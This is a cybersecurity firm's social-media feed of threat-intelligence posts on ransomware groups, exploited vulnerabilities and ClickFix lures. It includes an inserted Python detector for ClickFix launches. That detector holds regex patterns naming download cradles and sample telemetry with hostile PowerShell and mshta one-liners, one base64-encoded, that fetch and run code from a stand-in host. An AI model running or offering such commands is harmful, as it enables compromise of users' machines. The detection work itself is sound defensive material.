MOXFIVE (@mox_five)

340 posts

MOXFIVE is a cybersecurity company helping organizations respond to incidents and minimize the risk of future attacks.

Joined December 2018
98 Following, 112 Followers

MOXFIVE @mox_five
MOXFIVE just published a Threat Actor Alert on TeamPCP's active software supply chain campaign. LiteLLM versions 1.82.7 and 1.82.8 on PyPI contain a malicious payload, the latest development in a campaign that has been running since March 19, hitting Trivy, GitHub Actions, Docker Hub, npm, and Checkmarx KICS before reaching PyPI.
🔸 March 19: Trivy compromised, 10,000+ CI/CD pipelines exposed
🔸 March 20: Stolen npm tokens seeded CanisterWorm across 64+ packages
🔸 March 22: Malicious Trivy Docker images pushed directly to Docker Hub
🔸 March 23: Checkmarx KICS GitHub Action tags hijacked
🔸 March 24: LiteLLM 1.82.7 and 1.82.8 published to PyPI with a malicious payload
The full report covers the complete campaign timeline and includes resilience recommendations for organizations that may have been exposed.
Read the full report: bit.ly/4takNBY
Have questions or need help responding? Reach out to our team at incident@moxfive.com or 833-568-6695.
#SupplyChainSecurity #ThreatIntelligence #IncidentResponse #Cybersecurity #IR #TeamPCP #LiteLLM #Trivy #Checkmarx
MOXFIVE @mox_five
Business email compromise is much more than just a phishing problem. BEC and funds transfer fraud remain among the most persistent and costly eCrime threats facing businesses today. The attacks are sophisticated. The financial and legal fallout is real. And most organizations aren't as prepared as they think. That's why we're bringing together experts for a live panel webinar built around one goal: making sure you know exactly what to do when it matters most.
Join Lee Trotter, Michael Brunetti, Kim Detwiler and Melissa Sachs on Wednesday, April 8th at 2pm ET and learn more about:
🔸 The current BEC threat landscape — what's evolved and what defenders need to know
🔸 Forensic investigation methodology and key milestones
🔸 Getting maximum value from your privacy counsel partnership
🔸 Post-investigation data mining — efficiencies and pitfalls
🔸 Real-world case studies + live Q&A
Whether you're in security, legal, compliance, or risk — this is one you don't want to miss.
Register Today >> bit.ly/4uIsgcX
Questions? Contact us at incident@moxfive.com or 833-568-6695.
#cybersecurity #incidentresponse #ir #dfir #BECs #FTF #eCrime
MOXFIVE @mox_five
MOXFIVE Monthly Insights are out today! February marked a sharp escalation in the cyber threat environment. The strikes against Iran on February 28 drove an immediate surge in Iranian-aligned cyber activity, with state-sponsored intrusions confirmed on US networks and US companies experiencing destructive attacks resulting in system wipes. bit.ly/3NIhp28
Key Findings:
🔸 Iranian Cyber Threat Landscape: State-sponsored groups including MuddyWater established access on US networks before the conflict escalated, while hacktivist groups launched coordinated DDoS, defacement, and data breach campaigns targeting US, Gulf, and allied organizations. Confirmed destructive attacks against US enterprises show the threat extends well beyond the region.
🔸 Ransomware Remained High: Qilin led for the second consecutive month, with Cl0p continuing its Oracle E-Business Suite exploitation campaign. Play, Akira, and DragonForce were all active across multiple industries, while data extortion groups ShinyHunters and World Leaks continued operations centered on theft and extortion rather than encryption.
🔸 Critical Vulnerabilities: Active exploitation was confirmed across remote access platforms, email infrastructure, and virtualization environments, including flaws in BeyondTrust remote access products, SmarterMail, and VMware ESXi systems linked to ransomware campaigns.
🔸 Most Impacted Industries: Technology and Financial organizations saw the highest impact in February, followed by Healthcare, Manufacturing and Production, and Construction and Engineering.
🔸 Defending Against Disruptive and Destructive Threats: When the threat includes wiper malware and destructive attacks, prevention alone is not enough. Patched edge devices, hardened identities, verified backups, and no default credentials on OT systems are the foundation. Business resilience and operational continuity planning determine how quickly organizations recover when prevention falls short.
Read the full February report at bit.ly/3NIhp28 for detailed analysis on Iranian threat actors, active ransomware operations, exploitation trends, and resilience controls.
#ransomware #incidentresponse #ir #threatintelligence #threatintel #cybersecurity #Qilin #Akira #Play #DragonForce #Cl0p #Hacktivist #MuddyWater #Handala #OpIsrael #CottonSandstorm #zpentest #CyberAv3ngers #OilRig #APT33 #Agrius
MOXFIVE @mox_five
Our latest MOXFIVE Threat Actor Spotlight is out today! Since emerging in August 2025, The Gentlemen ransomware operation has listed more than 200 victims on its data leak site, with January and February alone accounting for more than half of all posted victims. From MOXFIVE's experience, this group is methodical. They come in through compromised credentials or exploited internet-facing services, conduct targeted reconnaissance, and deploy ransomware domain-wide via Group Policy for maximum impact.
A few things that set them apart:
🔸 Custom BYOVD defense evasion using ThrottleStop.sys (CVE-2025-7771) to terminate security tooling at the kernel level.
🔸 Variants for Windows, Linux, and ESXi, with encryption observed at both the hypervisor and OS level.
🔸 Data exfiltration before encryption, paired with shadow copy deletion and event log clearing to limit recovery options.
🔸 Domain-wide payload distribution via NETLOGON and SYSVOL.
🔸 Manufacturing and production organizations have been hit hardest, though targeting spans technology, financial services, healthcare, and education across multiple regions.
Read the full report: bit.ly/4bmUwdv
If your organization has been impacted or you have questions about The Gentlemen or other threat actors, reach out to our team at incident@moxfive.com or 833-568-6695.
#Ransomware #ThreatIntelligence #IncidentResponse #Cybersecurity #IR #TheGentlemen #RaaS
MOXFIVE @mox_five
January showed steady ransomware pressure, with a modest decline from December's volume. Established groups exploited familiar vulnerabilities while social engineering techniques continued to prove effective as initial access vectors.
Key Findings:
🔸 Active Threats: Qilin led deployment activity, followed by Sinobi and Akira. These RaaS operations maintained consistent pressure across Manufacturing and Production (most impacted), Technology, and Healthcare sectors.
🔸 Critical Exploits: APT28 weaponized a Microsoft Office security feature bypass (CVE-2026-21509) in espionage campaigns. Critical vulnerabilities in Oracle WebLogic and Ivanti Endpoint Manager Mobile both saw exploitation following disclosure, with mass scanning observed after public PoC release.
🔸 ClickFix Social Engineering: MOXFIVE responded to several cases involving ClickFix—a technique that manipulates users into executing malicious PowerShell commands by impersonating legitimate system prompts. ClickFix succeeds because it exploits user behavior, with variants like CrashFix that deliberately crash browsers before presenting fake recovery instructions. Users see what appears to be a legitimate system prompt and follow instructions that compromise their systems.
🔸 Defending Against ClickFix: User training remains critical—legitimate sites never ask users to paste commands into Run dialogs or PowerShell consoles. Combine awareness with restricted PowerShell execution, EDR command-line monitoring, and email gateway filtering for HTML attachments.
Read the full January report for detailed analysis on ClickFix campaigns, exploitation trends, and defense controls. bit.ly/4rZnvd2
Contact our team at incident@moxfive.com or 833-568-6695.
#Cybersecurity #Ransomware #SocialEngineering #ThreatIntelligence #IncidentResponse #Akira #Qilin #Sinobi
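The "EDR command-line monitoring" control in the post above, as an added example that is not MOXFIVE's code or part of the original post: a small detection pass over constructed process-creation records that flags the shape a ClickFix lure leaves on the endpoint, an interpreter launched from explorer.exe (the Run dialog host) with a hidden window, a download cradle, or an -EncodedCommand blob, which it decodes so the markers inside the script are matched too. The key=value record format, the field names (Host, ParentImage, Image, CommandLine), the hostnames and the URLs are assumptions for this example; map the fields to your EDR or Sysmon Event ID 1 schema.

```python
"""Added example (not MOXFIVE's code or tooling): flag ClickFix-style launches in
process-creation telemetry.

A ClickFix lure talks the user into pasting a command into the Run dialog or a
PowerShell console. On the endpoint that appears as explorer.exe (the Run dialog
host) spawning an interpreter with a hidden window, a download cradle or an
encoded command. The key=value record format and the field names (Host,
ParentImage, Image, CommandLine) are assumptions for this example; map them to
your EDR or Sysmon Event ID 1 schema.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Parents a user types into: explorer.exe hosts the Run dialog.
SUSPICIOUS_PARENTS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Content markers typical of pasted ClickFix one-liners.
CRADLE_PATTERNS = [
    r"-w(?:indowstyle)?\s+h(?:idden)?",                              # hide the console window
    r"\biex\b|invoke-expression",                                     # run downloaded text in memory
    r"\birm\b|invoke-restmethod|invoke-webrequest|downloadstring",    # download cradle
    r"mshta\s+https?://",                                             # HTA fetched from the web
    r"curl\s+[^|]*\|\s*(?:cmd|powershell)",                           # pipe a download into a shell
]
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE script).
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


@dataclass
class Finding:
    host: str
    parent: str
    image: str
    reasons: List[str]
    decoded: Optional[str] = None


def parse_record(line: str) -> dict:
    """Parse one key=value record; quoted values may contain spaces."""
    return {k: q if q else u for k, q, u in FIELD_RE.findall(line)}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand, or None if absent or not valid UTF-16LE."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(line: str) -> Optional[Finding]:
    """Flag an interpreter launched from explorer.exe whose command line carries ClickFix markers."""
    rec = parse_record(line)
    parent = rec.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    image = rec.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmdline = rec.get("CommandLine", "")
    if image not in INTERPRETERS or parent not in SUSPICIOUS_PARENTS:
        return None
    reasons = [f"{image} spawned by {parent}"]
    decoded = decode_encoded_command(cmdline)
    text = cmdline
    if decoded is not None:
        reasons.append("encoded command present")
        text = f"{cmdline} {decoded}"  # look for markers inside the decoded script as well
    reasons += [f"marker /{p}/" for p in CRADLE_PATTERNS if re.search(p, text, re.IGNORECASE)]
    # Parent alone is noise (users open cmd.exe from Explorer); require at least one content marker.
    if len(reasons) == 1:
        return None
    return Finding(rec.get("Host", "?"), parent, image, reasons, decoded)


def scan(lines: List[str]) -> List[Finding]:
    return [f for f in (analyze(l) for l in lines if l.strip()) if f is not None]


# Constructed sample telemetry (not real incident data); hostnames and URLs are invented.
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://verify.example/a')".encode("utf-16-le")
).decode()
SAMPLE_LINES = rf"""
Host=WS-042 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -w hidden -c iex (irm http://verify.example/fix)"
Host=WS-017 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -nop -w hidden -enc {_ENC}"
Host=WS-088 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\mshta.exe CommandLine="mshta http://verify.example/captcha.hta"
Host=WS-003 ParentImage=C:\Windows\System32\svchost.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"
Host=WS-005 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\cmd.exe CommandLine="cmd.exe"
""".strip().splitlines()

if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f"{f.host}: {f.image} <- {f.parent}; {'; '.join(f.reasons)}")
        if f.decoded:
            print(f"    decoded: {f.decoded}")
```

The rule is deliberately narrow: it keys on the explorer.exe parent because that is what a user pasting into the Run dialog produces, and it ignores the scheduled-task style launch from svchost.exe with -ExecutionPolicy Bypass so that administrative scripts do not swamp the queue. Decoding -EncodedCommand before matching matters because the visible command line of an encoded lure carries none of the cradle keywords.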
MOXFIVE @mox_five
MOXFIVE's latest Threat Actor Spotlight dives into LockBit 5.0 and the operation shows no signs of slowing down. bit.ly/4rv32wg
We've responded to recent incidents where LockBit 5.0 was deployed. Operators are pushing a refreshed leak site, recruiting affiliates with structured program rules, and marketing tooling built for scale across Windows, ESXi, and Linux environments.
🔸 The Scale of Activity: Over the last two months, postings on the LockBit 5.0 leak site include an estimated 100 victims. Targeting spans Technology, Healthcare, Construction, Financial Services, and Manufacturing, with the United States accounting for roughly 23% of victims, followed by Brazil, Italy, Germany, and Mexico.
🔸 Resilience Through Disruption: The operation survived law enforcement Operation Cronos in 2024 and continued releasing new versions, including LockBit 4.0 ("Green") and now 5.0. The affiliate model lowers friction for threat actors to adopt the ransomware, which means repeated deployments across industries and regions.
🔸 What's in the Report: Our new Threat Actor Spotlight breaks down LockBit's evolution, what operators advertise in their affiliate materials, what we've observed in recent engagements, and where LockBit 5.0 is being deployed. We also cover the controls that reduce blast radius when affiliates gain initial access.
Read the full report: bit.ly/4rv32wg
#ThreatIntelligence #Ransomware #LockBit #IncidentResponse #Cybersecurity #IR
MOXFIVE @mox_five
Register today for our next MOXFIVE Quarterly Ransomware Briefing on Wed. Feb 18th! Join Michael Rogers (@ANC13NT), Justin Boncaldo, and Ted Samuels for a look into the most active threat actors in 2025 including real-world case studies along with emerging threats and what to expect for 2026. bit.ly/4rlNN8X
MOXFIVE @mox_five
Innovation has always driven us at MOXFIVE and today we're changing how forensic investigations work with the launch of our Agentic Forensics Platform! Combining AI agents with expert validation by our team allows us to deliver forensic analysis faster than traditional methods without sacrificing any of the rigor our clients depend on.
What makes this different: We built this system from the ground up for production forensic work, not prototyped with off-the-shelf integrations. AI agents continuously collect artifacts, correlate activity across thousands of systems, and construct timelines. Human experts provide real-time validation and apply judgment to the complex, ambiguous questions that define every investigation.
Why now: The threat landscape is evolving rapidly. Anthropic recently disclosed the first AI-orchestrated cyber espionage campaign where attackers used agentic AI to perform up to 90% of a sophisticated intrusion. Their guidance was clear: security teams need to experiment with AI for defense in areas like incident response. This is that defensive application.
For organizations in crisis, this means predictable outcomes when timing matters most: faster analysis, clearer timelines, and findings that hold up to scrutiny.
Learn more about our agentic forensics platform at moxfive.ai
Read the press release >> bit.ly/4a0mZEd
#Cybersecurity #IncidentResponse #AI #Ransomware #DFIR #Forensics #IR
MOXFIVE @mox_five
December closed out 2025 as one of the most active months of the year for ransomware activity. Our latest MOXFIVE Monthly Insights report highlights critical trends organizations need to understand heading into the new year! bit.ly/49N3r66
Key Findings:
🔸 Active Threats: Qilin and Akira continued their dominance, together accounting for over 1,500 victims posted to leak sites in 2025. LockBit 5.0 activity surged with enhanced evasion capabilities and a redesigned affiliate panel, posting over 80 victims in December alone.
🔸 Exploitation Wave: Edge networking equipment became a prime target with critical vulnerabilities in Gladinet CentreStack, Fortinet FortiCloud SSO, and WatchGuard Fireware OS all actively exploited in December.
🔸 Industry Impact: Manufacturing and Production remained the most targeted sector followed by Construction & Engineering and Technology.
🔸 LockBit's Persistence: Despite law enforcement disruption in early 2024, LockBit operators launched version 5.0 in September with a modular architecture and improved stealth capabilities—demonstrating how established operations can maintain continuity even after significant infrastructure takedowns.
Read the full December report for detailed analysis on vulnerabilities, threat actor TTPs, and resilience controls. bit.ly/49N3r66
Have questions or need help strengthening your ransomware defenses? Contact our team at incident@moxfive.com or 833-568-6695.
#Cybersecurity #Ransomware #ThreatIntelligence #IncidentResponse #InfoSec #Qilin #Akira #LockBit #IR
MOXFIVE @mox_five
Our team at MOXFIVE just released our 2025 Ransomware Review, and the trends are clear: ransomware operators continue to refine their tactics with devastating efficiency.
Key takeaways from the year:
Top Threats:
🔸 Akira led ransomware activity, followed by Qilin, Play, INC, and Cl0p.
🔸 RaaS operations dominated the landscape
🔸 Groups like Scattered Spider expanded their social engineering campaigns
Initial Access:
🔸 VPN access remained the most common entry point
🔸 Exploitation of internet-facing vulnerabilities was second most common
🔸 Remote access security continues to be a critical weak point
Exploitation Waves: We tracked significant campaigns throughout the year, from Ivanti Connect Secure in Q1 to Oracle E-Business Suite in Q3/Q4. Zero-day exploitation and delayed patching continue to create windows of opportunity for threat actors.
Heading into 2026, the fundamentals haven't changed: remote access security, timely patching, and identity protection remain essential. The threat landscape favors affiliate-driven operations with reliable access methods.
Read the full report at bit.ly/3Lh5uHx for detailed analysis on ransomware operations, initial access trends, and exploited vulnerabilities throughout 2025.
Need help strengthening your ransomware resilience? Contact our team at incident@moxfive.com or 833-568-6695.
#Cybersecurity #Ransomware #ThreatIntelligence #IncidentResponse #Akira #Qilin #Play #IncRansom #Cl0p #ScatteredSpider #VPN #RemoteAccess #ThreatIntel #EDR #CyberResilience #RaaS
MOXFIVE @mox_five
Happy Holidays from the MOXFIVE Team! Thank you to everyone we worked with this year - we always appreciate you putting your trust in our team and look forward to a fantastic 2026!
MOXFIVE @mox_five
Our latest MOXFIVE Monthly Insights for November is now available! Akira continued to be one of the most frequently deployed variants, while Cl0p's Oracle E-Business Suite extortion campaign became increasingly visible through data leak site postings. Overall volume dipped slightly from October but remained elevated compared to earlier months.
Key Threats & Trends This Month:
🔸 Cl0p Oracle EBS campaign: Zero-day exploitation continues to drive large-scale extortion, with 100+ organizations added to leak sites in recent weeks.
🔸 CentreStack RCE (CVE-2025-30406): Actively exploited months after disclosure, including deployments of Warlock ransomware via internet-facing file-sharing portals.
🔸 React2Shell (CVE-2025-55182): Newly disclosed React Server Components RCE triggered immediate scanning and automated exploitation attempts.
🔸 RaaS dominance: Affiliate-driven ransomware operations remain a primary driver of volume, with credential-based and remote-access intrusions leading the way.
Resilience Takeaway: Unpatched, internet-facing collaboration and file-sharing services continue to present a direct path to ransomware and extortion. Strong patch management, MFA enforcement, EDR coverage, reduced exposure, and validated backups remain essential.
Read the full November report: bit.ly/48VJI3K
#cybersecurity #ransomware #IncidentResponse #IR #ThreatIntel #ThreatIntelligence #Cl0p #Akira #CentreStack #React2Shell #RaaS #Warlock #Qilin #Play #IncRansom
MOXFIVE @mox_five
This month our MOXFIVE Threat Actor Spotlight focuses on ShinySp1d3r, a ransomware-as-a-service operation being developed and promoted by the Scattered LAPSUS$ Hunters Alliance. Combining the tradecraft of Scattered Spider, LAPSUS$, and ShinyHunters, the alliance has the capability to coordinate data theft and extortion operations at scale, raising the potential impact of any future ShinySp1d3r deployment.
What we're seeing:
🔸 SLSH is promoting a developing ShinySp1d3r RaaS with a modular encryptor and planned Windows, Linux, and VMware ESXi variants.
🔸 Current communication from the group is through Telegram channels which are a mix of claims, taunts, and threats that still need to be weighed against technical evidence.
🔸 The alliance has already launched a separate successful extortion campaign targeting Salesforce data and posted over 40 victims on a joint leak site.
Why it matters:
🔸 Public alignment of these three groups - sharing leak sites and messaging - is a notable and concerning escalation.
🔸 A mature ShinySp1d3r RaaS could quickly become a high-impact ransomware threat as we enter 2026.
Read the full Threat Actor Spotlight >> bit.ly/3KETsHu
#ransomware #ShinySp1d3r #RaaS #ScatteredSpider #LAPSUS$ #ShinyHunters #incidentresponse #IR #cybersecurity #threatintel #threatintelligence
MOXFIVE @mox_five
Ransomware activity surged in October, driven by aggressive Qilin deployments and steady operations from Akira, Inc, and Play. New variants—including Tengu, Genesis, Radiant, and Kryptos—also entered the landscape, each launching leak sites and posting victims. We also saw active exploitation of major vulnerabilities, including the Oracle E-Business Suite zero-day (CVE-2025-61882) and Fortra GoAnywhere MFT (CVE-2025-10035), both used in extortion-focused campaigns by Cl0p and Medusa respectively. Manufacturing, Healthcare, Technology, and Retail remained top targets as threat actors continued to pursue high-impact, interconnected environments.
As attacker timelines shrink with AI-driven automation, resilience fundamentals matter more than ever. We recommend the following End of Year Priorities:
🔸 Validate EDR coverage & identity log completeness
🔸 Complete at least one full backup restoration test
🔸 Patch exposed systems & remove unnecessary access
🔸 Enforce MFA on all privileged & remote pathways
🔸 Conduct a focused ransomware or identity compromise tabletop
Read the full October Insights at bit.ly/4866eGx to see what we're watching, the top playbooks to have ready, and how MOXFIVE helps teams strengthen resilience across modern enterprise environments.
#ransomware #Akira #Play #IncRansom #Qilin #Cl0p #Medusa #Oracle #ZeroDay #Fortra #EDR #MDR #Tengu #Kryptos #Genesis #Radiant #MFA #Backups #Cybersecurity #IncidentResponse #ThreatIntelligence #ThreatIntel #IR #DFIR
MOXFIVE @mox_five
If you missed our Quarterly Ransomware briefing yesterday, the replay is now available! bit.ly/47shI8l Michael Rogers (@ANC13NT), John Beers, Dylan Duncan, and Britton Manahan covered the most significant ransomware developments from Q3 including recent exploits of SonicWall and Oracle vulnerabilities by Akira and Cl0p/Graceful Spider. We also shared one of the cool ways our forensics experts can gather key artifacts using Remote Desktop Protocol (RDP) bitmap cache files to build visual evidence of actions performed by threat actors. #ransomware #threatintel #threatintelligence #ir #Akira #Cl0p #GracefulSpider #cybersecurity #incidentresponse
MOXFIVE @mox_five
Since first appearing in September 2024, SafePay has grown into a prolific ransomware operation with its leak site listing 300+ victims. MOXFIVE's latest Threat Actor Spotlight examines how this group operates, who they target, and practical steps organizations can take to reduce risk.
Key takeaways:
🔸 Targeting: Technology and manufacturing organizations are the most impacted, followed by education, retail/hospitality, and healthcare.
🔸 Geography: The U.S. accounts for the largest share of victims; Germany, Canada, the U.K., and Australia have also seen activity.
🔸 Initial access: Compromised credentials, exposed RDP endpoints, and abuse of VPN/edge devices are primary entry vectors.
🔸 Tactics: Double-extortion—data is staged, compressed, exfiltrated, then systems are encrypted. Volume shadow copies are often deleted and leak-site publication used to escalate pressure.
🔸 Tradecraft: A blend of native Windows utilities, open-source scripts, commodity tooling, and a bespoke encryptor—emphasis on automation, credential reuse, and artifact cleanup.
If your organization relies on remote access or third-party connections, SafePay's activity underscores why strong credential hygiene, segmented remote access, proactive detection, and tested recovery plans are essential.
Read the full MOXFIVE Threat Actor Spotlight >> bit.ly/4qGpBib
#Ransomware #ThreatIntelligence #CyberSecurity #IncidentResponse #SafePay #ThreatIntel #IR
MOXFIVE @mox_five
Join us on Wednesday, Nov. 5th for our Q3 Quarterly Ransomware Briefing! In addition to ransomware trends from Q3 and resilience initiatives to think about for Q4, we’ve got a great segment sharing one of the cool ways our Forensics team can reveal critical evidence and literally see things from the eyes of the hacker during an investigation. Register today! bit.ly/3WjDd4T #ransomware #incidentresponse #ir #cybersecurity #cyberinsurance #threatintelligence #threatintel #dfir